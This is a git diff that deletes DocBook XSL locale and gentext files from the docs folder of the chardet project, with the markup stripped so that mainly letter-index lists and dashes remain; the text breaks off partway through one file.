- - - - - - - - - - - - - - - - - - - - - - - - - - - Symbols - A - a - À - à - Á - á -  - â - à - ã - Ä - ä - Å - å - Ā - ā - Ă - ă - Ą - ą - Ǎ - ǎ - Ǟ - ǟ - Ǡ - ǡ - Ǻ - ǻ - Ȁ - ȁ - Ȃ - ȃ - Ȧ - ȧ - - - - - - - - - - - - - - - - - - - - - - - - - - - - B - b - ƀ - Ɓ - ɓ - Ƃ - ƃ - - - - - - - C - c - Ç - ç - Ć - ć - Ĉ - ĉ - Ċ - ċ - Č - č - Ƈ - ƈ - ɕ - - - D - d - Ď - ď - Đ - đ - Ɗ - ɗ - Ƌ - ƌ - Dž - Dz - ȡ - ɖ - - - - - - - - - - - E - e - È - è - É - é - Ê - ê - Ë - ë - Ē - ē - Ĕ - ĕ - Ė - ė - Ę - ę - Ě - ě - Ȅ - ȅ - Ȇ - ȇ - Ȩ - ȩ - - - - - - - - - - - - - - - - - - ế - - - - - - - - - F - f - Ƒ - ƒ - - - G - g - Ĝ - ĝ - Ğ - ğ - Ġ - ġ - Ģ - ģ - Ɠ - ɠ - Ǥ - ǥ - Ǧ - ǧ - Ǵ - ǵ - - - H - h - Ĥ - ĥ - Ħ - ħ - Ȟ - ȟ - ɦ - - - - - - - - - - - - I - i - Ì - ì - Í - í - Î - î - Ï - ï - Ĩ - ĩ - Ī - ī - Ĭ - ĭ - Į - į - İ - Ɨ - ɨ - Ǐ - ǐ - Ȉ - ȉ - Ȋ - ȋ - - - - - - - - - J - j - Ĵ - ĵ - ǰ - ʝ - K - k - Ķ - ķ - Ƙ - ƙ - Ǩ - ǩ - - - - - - - L - l - Ĺ - ĺ - Ļ - ļ - Ľ - ľ - Ŀ - ŀ - Ł - ł - ƚ - Lj - ȴ - ɫ - ɬ - ɭ - - - - - - - - - M - m - ɱ - - ḿ - - - - - N - n - Ñ - ñ - Ń - ń - Ņ - ņ - Ň - ň - Ɲ - ɲ - ƞ - Ƞ - Nj - Ǹ - ǹ - ȵ - ɳ - - - - - - - - - O - o - Ò - ò - Ó - ó - Ô - ô - Õ - õ - Ö - ö - Ø - ø - Ō - ō - Ŏ - ŏ - Ő - ő - Ɵ - Ơ - ơ - Ǒ - ǒ - Ǫ - ǫ - Ǭ - ǭ - Ǿ - ǿ - Ȍ - ȍ - Ȏ - ȏ - Ȫ - ȫ - Ȭ - ȭ - Ȯ - ȯ - Ȱ - ȱ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - P - p - Ƥ - ƥ - - - - - Q - q - ʠ - R - r - Ŕ - ŕ - Ŗ - ŗ - Ř - ř - Ȑ - ȑ - Ȓ - ȓ - ɼ - ɽ - ɾ - - - - - - - - - S - s - Ś - ś - Ŝ - ŝ - Ş - ş - Š - š - Ș - ș - ʂ - - - - - - - - - - - T - t - Ţ - ţ - Ť - ť - Ŧ - ŧ - ƫ - Ƭ - ƭ - Ʈ - ʈ - Ț - ț - ȶ - - - - - - - - - - U - u - Ù - ù - Ú - ú - Û - û - Ü - ü - Ũ - ũ - Ū - ū - Ŭ - ŭ - Ů - ů - Ű - ű - Ų - ų - Ư - ư - Ǔ - ǔ - Ǖ - ǖ - Ǘ - ǘ - Ǚ - ǚ - Ǜ - ǜ - Ȕ - ȕ - Ȗ - ȗ - - - - - - - - - - - - - - - - - - - - - - - - - V - v - Ʋ - ʋ - - - - ṿ - W - w - Ŵ - ŵ - - - - - - - - - - - - X - x - - - - - Y - y - Ý - ý - ÿ - Ÿ - Ŷ - ŷ - Ƴ - ƴ - Ȳ - ȳ - - - - - - - - - - - - Z - z - Ź - ź - Ż - ż - Ž - ž - Ƶ - ƶ - Ȥ - ȥ - ʐ - ʑ - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/fi.xml b/chardet/docs/docbook/xsl/common/fi.xml deleted file mode 100644 index 12db880..0000000 --- a/chardet/docs/docbook/xsl/common/fi.xml +++ /dev/null @@ -1,1153 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Symbols - A - a - À - à - Á - á -  - â - à - ã - Ä - ä - Å - å - Ā - ā - Ă - ă - Ą - ą - Ǎ - ǎ - Ǟ - ǟ - Ǡ - ǡ - Ǻ - ǻ - Ȁ - ȁ - Ȃ - ȃ - Ȧ - ȧ - - - - - - - - - - - - - - - - - - - - - - - - - - - - B - b - ƀ - Ɓ - ɓ - Ƃ - ƃ - - - - - - - C - c - Ç - ç - Ć - ć - Ĉ - ĉ - Ċ - ċ - Č - č - Ƈ - ƈ - ɕ - - - D - d - Ď - ď - Đ - đ - Ɗ - ɗ - Ƌ - ƌ - Dž - Dz - ȡ - ɖ - - - - - - - - - - - E - e - È - è - É - é - Ê - ê - Ë - ë - Ē - ē - Ĕ - ĕ - Ė - ė - Ę - ę - Ě - ě - Ȅ - ȅ - Ȇ - ȇ - Ȩ - ȩ - - - - - - - - - - - - - - - - - - ế - - - - - - - - - F - f - Ƒ - ƒ - - - G - g - Ĝ - ĝ - Ğ - ğ - Ġ - ġ - Ģ - ģ - Ɠ - ɠ - Ǥ - ǥ - Ǧ - ǧ - Ǵ - ǵ - - - H - h - Ĥ - ĥ - Ħ - ħ - Ȟ - ȟ - ɦ - - - - - - - - - - - - I - i - Ì - ì - Í - í - Î - î - Ï - ï - Ĩ - ĩ - Ī - ī - Ĭ - ĭ - Į - į - İ - Ɨ - ɨ - Ǐ - ǐ - Ȉ - ȉ - Ȋ - ȋ - - - - - - - - - J - j - Ĵ - ĵ - ǰ - ʝ - K - k - Ķ - ķ - Ƙ - ƙ - Ǩ - ǩ - - - - - - - L - l - Ĺ - ĺ - Ļ - ļ - Ľ - ľ - Ŀ - ŀ - Ł - ł - ƚ - Lj - ȴ - ɫ - ɬ - ɭ - - - - - - - - - M - m - ɱ - - ḿ - - - - - N - n - Ñ - ñ - Ń - ń - Ņ - ņ - Ň - ň - Ɲ - ɲ - ƞ - Ƞ - Nj - Ǹ - ǹ - ȵ - ɳ - - - - - - - - - O - o - Ò - ò - Ó - ó - Ô - ô - Õ - õ - Ö - ö - Ø - ø - Ō - ō - Ŏ - ŏ - Ő - ő - Ɵ - Ơ - ơ - Ǒ - ǒ - Ǫ - ǫ - Ǭ - ǭ - Ǿ - ǿ - Ȍ - ȍ - Ȏ - ȏ - Ȫ - ȫ - Ȭ - ȭ - Ȯ - ȯ - Ȱ - ȱ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - P - p - Ƥ - ƥ - - - - - Q - q - ʠ - R - r - Ŕ - ŕ - Ŗ - ŗ - Ř - ř - Ȑ - ȑ - Ȓ - ȓ - ɼ - ɽ - ɾ - - - - - - - - - S - s - Ś - ś - Ŝ - ŝ - Ş - ş - Š - š - Ș - ș - ʂ - - - - - - - - - - - T - t - Ţ - ţ - Ť - ť - Ŧ - ŧ - ƫ - Ƭ - ƭ - Ʈ - ʈ - Ț - ț - ȶ - - - - - - - - - - U - u - Ù - ù - Ú - ú - Û - û - Ü - ü - Ũ - ũ - Ū - ū - Ŭ - ŭ - Ů - ů - Ű - ű - Ų - ų - Ư - ư - Ǔ - ǔ - Ǖ - ǖ - Ǘ - ǘ - Ǚ - ǚ - Ǜ - ǜ - Ȕ - ȕ - Ȗ - ȗ - - - - - - - - - - - - - - - - - - - - - - - - - V - v - Ʋ - ʋ - - - - ṿ - W - w - Ŵ - ŵ - - - - - - - - - - - - X - x - - - - - Y - y - Ý - ý - ÿ - Ÿ - Ŷ - ŷ - Ƴ - ƴ - Ȳ - ȳ - - - - - - - - - - - - Z - z - Ź - ź - Ż - ż - Ž - ž - Ƶ - ƶ - Ȥ - ȥ - ʐ - ʑ - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/fr.xml b/chardet/docs/docbook/xsl/common/fr.xml deleted file mode 100644 index e918147..0000000 --- a/chardet/docs/docbook/xsl/common/fr.xml +++ /dev/null @@ -1,614 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Symboles - A - a - à - À - â -  - Æ - æ - B - b - C - c - ç - D - d - E - e - ê - Ê - é - É - è - È - ë - Ë - - F - f - G - g - H - h - I - i - Î - î - Ï - ï - J - j - K - k - L - l - M - m - N - n - O - o - Ö - ö - Œ - œ - P - p - Q - q - R - r - S - s - T - t - U - u - Ù - ù - Û - û - Ü - ü - V - v - W - w - X - x - Y - y - Z - z - - diff --git a/chardet/docs/docbook/xsl/common/gentext.xsl b/chardet/docs/docbook/xsl/common/gentext.xsl deleted file mode 100644 index bc6ab70..0000000 --- a/chardet/docs/docbook/xsl/common/gentext.xsl +++ /dev/null @@ -1,716 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - .formal - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - object.xref.markup: empty xref template - for linkend=" - - " and @xrefstyle=" - - " - - - - - - - - - - - - - - - - - - - - - - - - Xref is only supported to listitems in an - orderedlist: - - - ??? - - - - - - - - - - - - - - - - - - - - - - - - %n - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 1 - - - - - - - - - - - - - - - - - Attempt to use %d in gentext with no referrer! - - - - - - - % - - - % - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - labelnumber - - - labelname - - - label - - - - - - - - quotedtitle - - - title - - - - - - - - - - - nopage - - - pagenumber - - - pageabbrev - - - Page - - - page - - - - - - - - - - - %n - - - - - - - - - - - - - - - - - - - - - - - - - - - - %t - - - - - - %t - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - %p - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/he.xml b/chardet/docs/docbook/xsl/common/he.xml deleted file mode 100644 index 193b3b8..0000000 --- a/chardet/docs/docbook/xsl/common/he.xml +++ /dev/null @@ -1,1153 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Symbols - A - a - À - à - Á - á -  - â - à - ã - Ä - ä - Å - å - Ā - ā - Ă - ă - Ą - ą - Ǎ - ǎ - Ǟ - ǟ - Ǡ - ǡ - Ǻ - ǻ - Ȁ - ȁ - Ȃ - ȃ - Ȧ - ȧ - - - - - - - - - - - - - - - - - - - - - - - - - - - - B - b - ƀ - Ɓ - ɓ - Ƃ - ƃ - - - - - - - C - c - Ç - ç - Ć - ć - Ĉ - ĉ - Ċ - ċ - Č - č - Ƈ - ƈ - ɕ - - - D - d - Ď - ď - Đ - đ - Ɗ - ɗ - Ƌ - ƌ - Dž - Dz - ȡ - ɖ - - - - - - - - - - - E - e - È - è - É - é - Ê - ê - Ë - ë - Ē - ē - Ĕ - ĕ - Ė - ė - Ę - ę - Ě - ě - Ȅ - ȅ - Ȇ - ȇ - Ȩ - ȩ - - - - - - - - - - - - - - - - - - ế - - - - - - - - - F - f - Ƒ - ƒ - - - G - g - Ĝ - ĝ - Ğ - ğ - Ġ - ġ - Ģ - ģ - Ɠ - ɠ - Ǥ - ǥ - Ǧ - ǧ - Ǵ - ǵ - - - H - h - Ĥ - ĥ - Ħ - ħ - Ȟ - ȟ - ɦ - - - - - - - - - - - - I - i - Ì - ì - Í - í - Î - î - Ï - ï - Ĩ - ĩ - Ī - ī - Ĭ - ĭ - Į - į - İ - Ɨ - ɨ - Ǐ - ǐ - Ȉ - ȉ - Ȋ - ȋ - - - - - - - - - J - j - Ĵ - ĵ - ǰ - ʝ - K - k - Ķ - ķ - Ƙ - ƙ - Ǩ - ǩ - - - - - - - L - l - Ĺ - ĺ - Ļ - ļ - Ľ - ľ - Ŀ - ŀ - Ł - ł - ƚ - Lj - ȴ - ɫ - ɬ - ɭ - - - - - - - - - M - m - ɱ - - ḿ - - - - - N - n - Ñ - ñ - Ń - ń - Ņ - ņ - Ň - ň - Ɲ - ɲ - ƞ - Ƞ - Nj - Ǹ - ǹ - ȵ - ɳ - - - - - - - - - O - o - Ò - ò - Ó - ó - Ô - ô - Õ - õ - Ö - ö - Ø - ø - Ō - ō - Ŏ - ŏ - Ő - ő - Ɵ - Ơ - ơ - Ǒ - ǒ - Ǫ - ǫ - Ǭ - ǭ - Ǿ - ǿ - Ȍ - ȍ - Ȏ - ȏ - Ȫ - ȫ - Ȭ - ȭ - Ȯ - ȯ - Ȱ - ȱ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - P - p - Ƥ - ƥ - - - - - Q - q - ʠ - R - r - Ŕ - ŕ - Ŗ - ŗ - Ř - ř - Ȑ - ȑ - Ȓ - ȓ - ɼ - ɽ - ɾ - - - - - - - - - S - s - Ś - ś - Ŝ - ŝ - Ş - ş - Š - š - Ș - ș - ʂ - - - - - - - - - - - T - t - Ţ - ţ - Ť - ť - Ŧ - ŧ - ƫ - Ƭ - ƭ - Ʈ - ʈ - Ț - ț - ȶ - - - - - - - - - - U - u - Ù - ù - Ú - ú - Û - û - Ü - ü - Ũ - ũ - Ū - ū - Ŭ - ŭ - Ů - ů - Ű - ű - Ų - ų - Ư - ư - Ǔ - ǔ - Ǖ - ǖ - Ǘ - ǘ - Ǚ - ǚ - Ǜ - ǜ - Ȕ - ȕ - Ȗ - ȗ - - - - - - - - - - - - - - - - - - - - - - - - - V - v - Ʋ - ʋ - - - - ṿ - W - w - Ŵ - ŵ - - - - - - - - - - - - X - x - - - - - Y - y - Ý - ý - ÿ - Ÿ - Ŷ - ŷ - Ƴ - ƴ - Ȳ - ȳ - - - - - - - - - - - - Z - z - Ź - ź - Ż - ż - Ž - ž - Ƶ - ƶ - Ȥ - ȥ - ʐ - ʑ - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/hr.xml b/chardet/docs/docbook/xsl/common/hr.xml deleted file mode 100644 index 6ab2590..0000000 --- a/chardet/docs/docbook/xsl/common/hr.xml +++ /dev/null @@ -1,1153 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Symbols - A - a - À - à - Á - á -  - â - à - ã - Ä - ä - Å - å - Ā - ā - Ă - ă - Ą - ą - Ǎ - ǎ - Ǟ - ǟ - Ǡ - ǡ - Ǻ - ǻ - Ȁ - ȁ - Ȃ - ȃ - Ȧ - ȧ - - - - - - - - - - - - - - - - - - - - - - - - - - - - B - b - ƀ - Ɓ - ɓ - Ƃ - ƃ - - - - - - - C - c - Ç - ç - Ć - ć - Ĉ - ĉ - Ċ - ċ - Č - č - Ƈ - ƈ - ɕ - - - D - d - Ď - ď - Đ - đ - Ɗ - ɗ - Ƌ - ƌ - Dž - Dz - ȡ - ɖ - - - - - - - - - - - E - e - È - è - É - é - Ê - ê - Ë - ë - Ē - ē - Ĕ - ĕ - Ė - ė - Ę - ę - Ě - ě - Ȅ - ȅ - Ȇ - ȇ - Ȩ - ȩ - - - - - - - - - - - - - - - - - - ế - - - - - - - - - F - f - Ƒ - ƒ - - - G - g - Ĝ - ĝ - Ğ - ğ - Ġ - ġ - Ģ - ģ - Ɠ - ɠ - Ǥ - ǥ - Ǧ - ǧ - Ǵ - ǵ - - - H - h - Ĥ - ĥ - Ħ - ħ - Ȟ - ȟ - ɦ - - - - - - - - - - - - I - i - Ì - ì - Í - í - Î - î - Ï - ï - Ĩ - ĩ - Ī - ī - Ĭ - ĭ - Į - į - İ - Ɨ - ɨ - Ǐ - ǐ - Ȉ - ȉ - Ȋ - ȋ - - - - - - - - - J - j - Ĵ - ĵ - ǰ - ʝ - K - k - Ķ - ķ - Ƙ - ƙ - Ǩ - ǩ - - - - - - - L - l - Ĺ - ĺ - Ļ - ļ - Ľ - ľ - Ŀ - ŀ - Ł - ł - ƚ - Lj - ȴ - ɫ - ɬ - ɭ - - - - - - - - - M - m - ɱ - - ḿ - - - - - N - n - Ñ - ñ - Ń - ń - Ņ - ņ - Ň - ň - Ɲ - ɲ - ƞ - Ƞ - Nj - Ǹ - ǹ - ȵ - ɳ - - - - - - - - - O - o - Ò - ò - Ó - ó - Ô - ô - Õ - õ - Ö - ö - Ø - ø - Ō - ō - Ŏ - ŏ - Ő - ő - Ɵ - Ơ - ơ - Ǒ - ǒ - Ǫ - ǫ - Ǭ - ǭ - Ǿ - ǿ - Ȍ - ȍ - Ȏ - ȏ - Ȫ - ȫ - Ȭ - ȭ - Ȯ - ȯ - Ȱ - ȱ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - P - p - Ƥ - ƥ - - - - - Q - q - ʠ - R - r - Ŕ - ŕ - Ŗ - ŗ - Ř - ř - Ȑ - ȑ - Ȓ - ȓ - ɼ - ɽ - ɾ - - - - - - - - - S - s - Ś - ś - Ŝ - ŝ - Ş - ş - Š - š - Ș - ș - ʂ - - - - - - - - - - - T - t - Ţ - ţ - Ť - ť - Ŧ - ŧ - ƫ - Ƭ - ƭ - Ʈ - ʈ - Ț - ț - ȶ - - - - - - - - - - U - u - Ù - ù - Ú - ú - Û - û - Ü - ü - Ũ - ũ - Ū - ū - Ŭ - ŭ - Ů - ů - Ű - ű - Ų - ų - Ư - ư - Ǔ - ǔ - Ǖ - ǖ - Ǘ - ǘ - Ǚ - ǚ - Ǜ - ǜ - Ȕ - ȕ - Ȗ - ȗ - - - - - - - - - - - - - - - - - - - - - - - - - V - v - Ʋ - ʋ - - - - ṿ - W - w - Ŵ - ŵ - - - - - - - - - - - - X - x - - - - - Y - y - Ý - ý - ÿ - Ÿ - Ŷ - ŷ - Ƴ - ƴ - Ȳ - ȳ - - - - - - - - - - - - Z - z - Ź - ź - Ż - ż - Ž - ž - Ƶ - ƶ - Ȥ - ȥ - ʐ - ʑ - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/hu.xml b/chardet/docs/docbook/xsl/common/hu.xml deleted file mode 100644 index a409eb8..0000000 --- a/chardet/docs/docbook/xsl/common/hu.xml +++ /dev/null @@ -1,1153 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Symbols - A - a - À - à - Á - á -  - â - à - ã - Ä - ä - Å - å - Ā - ā - Ă - ă - Ą - ą - Ǎ - ǎ - Ǟ - ǟ - Ǡ - ǡ - Ǻ - ǻ - Ȁ - ȁ - Ȃ - ȃ - Ȧ - ȧ - - - - - - - - - - - - - - - - - - - - - - - - - - - - B - b - ƀ - Ɓ - ɓ - Ƃ - ƃ - - - - - - - C - c - Ç - ç - Ć - ć - Ĉ - ĉ - Ċ - ċ - Č - č - Ƈ - ƈ - ɕ - - - D - d - Ď - ď - Đ - đ - Ɗ - ɗ - Ƌ - ƌ - Dž - Dz - ȡ - ɖ - - - - - - - - - - - E - e - È - è - É - é - Ê - ê - Ë - ë - Ē - ē - Ĕ - ĕ - Ė - ė - Ę - ę - Ě - ě - Ȅ - ȅ - Ȇ - ȇ - Ȩ - ȩ - - - - - - - - - - - - - - - - - - ế - - - - - - - - - F - f - Ƒ - ƒ - - - G - g - Ĝ - ĝ - Ğ - ğ - Ġ - ġ - Ģ - ģ - Ɠ - ɠ - Ǥ - ǥ - Ǧ - ǧ - Ǵ - ǵ - - - H - h - Ĥ - ĥ - Ħ - ħ - Ȟ - ȟ - ɦ - - - - - - - - - - - - I - i - Ì - ì - Í - í - Î - î - Ï - ï - Ĩ - ĩ - Ī - ī - Ĭ - ĭ - Į - į - İ - Ɨ - ɨ - Ǐ - ǐ - Ȉ - ȉ - Ȋ - ȋ - - - - - - - - - J - j - Ĵ - ĵ - ǰ - ʝ - K - k - Ķ - ķ - Ƙ - ƙ - Ǩ - ǩ - - - - - - - L - l - Ĺ - ĺ - Ļ - ļ - Ľ - ľ - Ŀ - ŀ - Ł - ł - ƚ - Lj - ȴ - ɫ - ɬ - ɭ - - - - - - - - - M - m - ɱ - - ḿ - - - - - N - n - Ñ - ñ - Ń - ń - Ņ - ņ - Ň - ň - Ɲ - ɲ - ƞ - Ƞ - Nj - Ǹ - ǹ - ȵ - ɳ - - - - - - - - - O - o - Ò - ò - Ó - ó - Ô - ô - Õ - õ - Ö - ö - Ø - ø - Ō - ō - Ŏ - ŏ - Ő - ő - Ɵ - Ơ - ơ - Ǒ - ǒ - Ǫ - ǫ - Ǭ - ǭ - Ǿ - ǿ - Ȍ - ȍ - Ȏ - ȏ - Ȫ - ȫ - Ȭ - ȭ - Ȯ - ȯ - Ȱ - ȱ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - P - p - Ƥ - ƥ - - - - - Q - q - ʠ - R - r - Ŕ - ŕ - Ŗ - ŗ - Ř - ř - Ȑ - ȑ - Ȓ - ȓ - ɼ - ɽ - ɾ - - - - - - - - - S - s - Ś - ś - Ŝ - ŝ - Ş - ş - Š - š - Ș - ș - ʂ - - - - - - - - - - - T - t - Ţ - ţ - Ť - ť - Ŧ - ŧ - ƫ - Ƭ - ƭ - Ʈ - ʈ - Ț - ț - ȶ - - - - - - - - - - U - u - Ù - ù - Ú - ú - Û - û - Ü - ü - Ũ - ũ - Ū - ū - Ŭ - ŭ - Ů - ů - Ű - ű - Ų - ų - Ư - ư - Ǔ - ǔ - Ǖ - ǖ - Ǘ - ǘ - Ǚ - ǚ - Ǜ - ǜ - Ȕ - ȕ - Ȗ - ȗ - - - - - - - - - - - - - - - - - - - - - - - - - V - v - Ʋ - ʋ - - - - ṿ - W - w - Ŵ - ŵ - - - - - - - - - - - - X - x - - - - - Y - y - Ý - ý - ÿ - Ÿ - Ŷ - ŷ - Ƴ - ƴ - Ȳ - ȳ - - - - - - - - - - - - Z - z - Ź - ź - Ż - ż - Ž - ž - Ƶ - ƶ - Ȥ - ȥ - ʐ - ʑ - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/id.xml b/chardet/docs/docbook/xsl/common/id.xml deleted file mode 100644 index e6d7110..0000000 --- a/chardet/docs/docbook/xsl/common/id.xml +++ /dev/null @@ -1,1153 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Symbols - A - a - À - à - Á - á -  - â - à - ã - Ä - ä - Å - å - Ā - ā - Ă - ă - Ą - ą - Ǎ - ǎ - Ǟ - ǟ - Ǡ - ǡ - Ǻ - ǻ - Ȁ - ȁ - Ȃ - ȃ - Ȧ - ȧ - - - - - - - - - - - - - - - - - - - - - - - - - - - - B - b - ƀ - Ɓ - ɓ - Ƃ - ƃ - - - - - - - C - c - Ç - ç - Ć - ć - Ĉ - ĉ - Ċ - ċ - Č - č - Ƈ - ƈ - ɕ - - - D - d - Ď - ď - Đ - đ - Ɗ - ɗ - Ƌ - ƌ - Dž - Dz - ȡ - ɖ - - - - - - - - - - - E - e - È - è - É - é - Ê - ê - Ë - ë - Ē - ē - Ĕ - ĕ - Ė - ė - Ę - ę - Ě - ě - Ȅ - ȅ - Ȇ - ȇ - Ȩ - ȩ - - - - - - - - - - - - - - - - - - ế - - - - - - - - - F - f - Ƒ - ƒ - - - G - g - Ĝ - ĝ - Ğ - ğ - Ġ - ġ - Ģ - ģ - Ɠ - ɠ - Ǥ - ǥ - Ǧ - ǧ - Ǵ - ǵ - - - H - h - Ĥ - ĥ - Ħ - ħ - Ȟ - ȟ - ɦ - - - - - - - - - - - - I - i - Ì - ì - Í - í - Î - î - Ï - ï - Ĩ - ĩ - Ī - ī - Ĭ - ĭ - Į - į - İ - Ɨ - ɨ - Ǐ - ǐ - Ȉ - ȉ - Ȋ - ȋ - - - - - - - - - J - j - Ĵ - ĵ - 